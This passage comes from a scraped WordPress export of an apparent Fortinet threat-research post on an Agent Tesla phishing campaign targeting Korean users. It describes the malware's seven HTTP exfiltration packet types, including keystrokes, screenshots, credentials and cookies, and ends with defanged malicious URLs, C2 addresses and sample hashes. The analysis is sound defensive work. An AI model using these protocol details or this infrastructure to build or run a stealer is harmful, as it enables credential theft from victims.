class=\"cmp-image--title\">Figure 5.2 \u2013 Example of a packet structure with packet number \u201c6\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><i><br \/>  <\/i>Figure 5.2 shows an example of data with packet number \u201c6\u201d, which contains the basic information (\u201cheader\u201d part) and the Stolen Data (\u201cdata\u201d part) that is base64-encoded cookies. \u201c0de264895c1ed90486c73c6eb110af6c2222264a0854b0047b9ead88b718f7d0&quot;\u00a0is the Separator string that is hardcoded in Agent Tesla.<i>\u00a0<\/i><span>The Victim ID is a MD5 hash value generated from the system\u2019s hardware information.<\/span><\/p>\n<p>Agent Tesla provides seven kinds of packets to send data\/status to the attacker. Each packet has a packet number to identify the packet. They are \u201c0\u201d, \u201c1\u201d, \u201c2\u201d, \u201c3\u201d, \u201c4\u201d, \u201c5\u201d and \u201c6\u201d.<\/p>\n<ul>\n<li>Packet \u201c0\u201d: It is always the first packet to tell the attacker that Agent Tesla has started. It only contains the \u201cheader\u201d data.<\/li>\n<li>Packet \u201c1\u201d: It is sent once every 120 seconds. It is like a heartbeat to tell the attacker that Agent Tesla is alive. It only contains the \u201cheader\u201d data.<\/li>\n<li>Packet \u201c2\u201d: It is sent every 60 seconds and only contains the \u201cheader\u201d data. Agent Tesla reads the response and checks if it contains \u201cuninstall\u201d. If yes, it uninstalls Agent Tesla from the victim\u2019s system, including deleting all files made by Agent Tesla and removing keys from registry that Agent Tesla created, and exits the process.<\/li>\n<li>Packet \u201c3\u201d: It sends the victim\u2019s keystrokes (keylogger data) and stolen clipboard data within the \u201cdata\u201d part of the post.<\/li>\n<li>Packet \u201c4\u201d: It sends captured screenshots of the victim\u2019s screen within the \u201cdata\u201d part of the post.<\/li>\n<li>Packet \u201c5\u201d: It sends the credentials stolen from the software clients within the \u201cdata\u201d part of the post.<\/li>\n<li>Packet \u201c6\u201d: It sends cookies files in a ZIP archive that are collected from browsers and included within the \u201cdata\u201d part of the post.<\/li>\n<\/ul>\n<h2>Conclusion<\/h2>\n<p>In this analysis, I have shown how this phishing campaign began by targeting Korean users.\u00a0<\/p>\n<p>I then explained how the macro in the PowerPoint is used to execute a piece of VBScript-embedded-in-HTML code. It also leverages a complicated standalone VBS and PowerShell script code to perform multiple tasks, like upgrading, maintaining persistence, and process-hollowing.<\/p>\n<p>I then elaborated on what kind of software clients the Agent Tesla targets and what kind of data it is able to collect from them, as well as how the stolen data is sent to the attacker via the HTTP Post method.<\/p>\n<h2>Fortinet Protections<\/h2>\n<p>Fortinet customers are already protected from this malware by FortiGuard\u2019s <a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/web-filtering.html?utm_source=blog&amp;utm_campaign=web-filtering\">Web Filtering<\/a>, AntiVirus, <a href=\"https:\/\/www.fortiweb-cloud.com\/?utm_source=blog&amp;utm_campaign=fortiweb-cloud\">FortiEDR<\/a>, and CDR (content disarm and reconstruction) services, as follows:<\/p>\n<p>The malicious Macro inside the PowerPoint sample can be disarmed by the FortiGuard CDR (content disarm and reconstruction) service.<\/p>\n<p>All relevant URLs have been rated as &quot;<b>Malicious Websites<\/b>&quot; by the FortiGuard Web Filtering service.<\/p>\n<p>The\u00a0PowerPoint sample attached to the phishing email and the standalone VBS file are detected as &quot;<b>VBA\/Agent.BLY!tr<\/b>&quot; and &quot;<b>VBS\/AgentTesla.VTO!tr.dldr<\/b>&quot; and are blocked by the FortiGuard AntiVirus service.<b><\/b><\/p>\n<p>FortiEDR detects the downloaded executable file as malicious\u00a0based on its behavior.<\/p>\n<p>FortiMail protects Fortinet customers by blocking phishing emails and applying FortiGuard\u2019s Web Filtering, AntiVirus, and CDR (content disarm and reconstruction) technologies.<\/p>\n<p>In addition to these protections, we suggest that organizations have their end users also go\u00a0through the\u00a0FREE\u00a0<a href=\"https:\/\/training.fortinet.com\/local\/staticpage\/view.php?page=nse_1&amp;utm_source=blog&amp;utm_campaign=nse-1\">NSE training<\/a>:\u00a0<a href=\"https:\/\/training.fortinet.com\/local\/staticpage\/view.php?page=nse_1&amp;utm_source=blog&amp;utm_campaign=nse-1\">NSE 1 \u2013 Information Security Awareness<\/a>. It includes a module on Internet threats that is designed to help end users learn how to identify and protect themselves from phishing attacks.<\/p>\n<h2>IOCs<\/h2>\n<p><b>URLs Involved in the Campaign:<\/b><\/p>\n<p>&quot;hxxps[:]\/\/onedayiwillloveyouforever[.]blogspot[.]com\/p\/divine111.html&quot;<br \/> &quot;hxxps[:]\/\/madarbloghogya[.]blogspot[.]com\/p\/divineback222.html&quot;<br \/> &quot;hxxps[:]\/\/bitbucket[.]org\/!api\/2.0\/snippets\/hogya\/5X7My8\/b271c1b3c7a78e7b68fa388ed463c7cc1dc32ddb\/files\/divine1-2&quot;<br \/> &quot;hxxp[:]\/\/149[.]56.200[.]165\/rump\/1.txt&quot;<br \/> &quot;hxxps[:]\/\/bitbucket[.]org\/!api\/2.0\/snippets\/hogya\/nxq8od\/c73df176f221868c33d4b3033ec04dc173d4ba4c\/files\/divine1-1&quot;<br \/> &quot;hxxp[:]\/\/69[.]174.99[.]181\/webpanel-divine\/mawa\/7dd66d9f8e1cf61ae198.php&quot;<\/p>\n<p><b>Sample SHA-256 Involved in the Campaign:<\/b><\/p>\n<p>[\uc0c8\u00a0\uad6c\ub9e4\u00a0\uc8fc\ubb38\uc11c\u00a0.ppa \/ new purchase order.ppa]<br \/> AA121762EB34D32C7D831D7ABCEC34F5A4241AF9E669E5CC43A49A071BD6E894<br \/> [UYA-update.vbs \/ GTQ.vbs]\u00a0<br \/> <i>0BBF16E320FB942E4EA09BB9E953076A4620F59E5FFAEFC3A2FFE8B8C2B3389C<\/i><\/p>\n<p><i>Learn more about\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=FortiGuardLabs\"><i>FortiGuard Labs<\/i><\/a><i>\u00a0global threat intelligence and research and the\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/support\/support-services\/fortiguard-security-subscriptions\/fortiguard-services-bundles.html?utm_source=blog&amp;utm_campaign=fortiguard-service-bundles\"><i>FortiGuard Security Subscriptions and Services<\/i><\/a><i>\u00a0portfolio.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<div id=\"om-qbkzwxxbiv83f0ol5a2d-holder\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image.img.png\/1639164322065\/picture1.png\"\/><br \/>FortiGuard Labs recently caught a phishing campaign that delivers a malicious PowerPoint file spreading a new variant of Agent Tesla. Read to learn more about the malicious macro, payload, and how the malware maintains persistence as well as how it exfiltrates stolen data and credentials.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-17988","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/17988","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=17988"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/17988\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=17988"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=17988"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=17988"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}